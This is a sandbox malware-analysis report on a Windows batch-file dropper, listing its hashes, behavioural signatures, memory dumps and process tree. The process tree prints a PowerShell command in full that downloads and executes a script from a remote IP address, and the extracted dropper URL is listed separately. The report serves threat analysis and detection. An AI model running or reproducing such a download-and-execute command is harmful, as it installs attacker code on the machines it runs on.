3c3e7899e6b30a6296d9e7e6a4c25ac2bdd7aa646176afbea2c2dc5198c2874e | Triage

Analysis

max time kernel
130s
max time network
68s
platform
windows10_x64
resource
win10v200430
submitted
15-05-2020 20:10

Sharing

Report Analysis Logs

General

Target

d4a380d12c8f386aeaa2ab8a1f33067f.bat
Size

218B
MD5

67895090003d0e397d064545c799e1b7
SHA1

b1864fd30e1c39495ed72a9cdf4744446233cc4d
SHA256

3c3e7899e6b30a6296d9e7e6a4c25ac2bdd7aa646176afbea2c2dc5198c2874e
SHA512

3492801a8dda9940ad6fdc7d76d3bd876fa7bf0ed30a62b8113ae39f460eeb7d28ff3b1db77b8c9dc61880be1c2137c1c3e68be77f1f6101741e5054599458de

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/d4a380d12c8f386aeaa2ab8a1f33067f

Signatures

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2204 2028 WerFault.exe powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

WerFault.exe

description pid process

Token: SeRestorePrivilege 2204 WerFault.exe
Token: SeBackupPrivilege 2204 WerFault.exe
Token: SeDebugPrivilege 2204 WerFault.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

WerFault.exe

pid	process
2204	WerFault.exe
2204	WerFault.exe
2204	WerFault.exe
2204	WerFault.exe
2204	WerFault.exe
2204	WerFault.exe
2204	WerFault.exe
2204	WerFault.exe
2204	WerFault.exe
2204	WerFault.exe
2204	WerFault.exe
2204	WerFault.exe
2204	WerFault.exe
2204	WerFault.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\d4a380d12c8f386aeaa2ab8a1f33067f.bat"
1⤵
PID:3788

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/d4a380d12c8f386aeaa2ab8a1f33067f');Invoke-YRZYGKQZCZH;Start-Sleep -s 10000"
2⤵
PID:2028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2028 -s 704
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:2204

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2204-0-0x0000000004AD0000-0x0000000004AD1000-memory.dmp

Filesize
4KB

Download
memory/2204-2-0x0000000005200000-0x0000000005201000-memory.dmp

Filesize
4KB

Download